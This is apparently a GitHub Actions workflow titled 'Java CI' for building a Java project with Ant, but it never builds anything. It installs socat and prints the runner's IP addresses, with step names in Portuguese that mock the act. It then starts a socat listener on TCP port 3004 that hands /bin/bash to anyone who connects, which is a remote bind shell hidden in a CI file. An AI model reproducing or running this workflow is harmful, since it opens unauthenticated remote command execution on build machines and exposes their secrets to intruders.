# This workflow will build a Java project with Ant
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-java-with-ant

name: Java CI

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v4
    - name: Set up JDK 11
      uses: actions/setup-java@v4
      with:
        java-version: '11'
        distribution: 'temurin'
    - name: Instalando Socat
      run: sudo apt install socat -y
    - name: Mostrando para todo mundo o meu ip HUAHUHAUHA
      run: ifconfig
    - name: Abrindo para porta externa
      run: socat TCP-LISTEN:3004,reuseaddr,fork EXEC:/bin/bash&
    
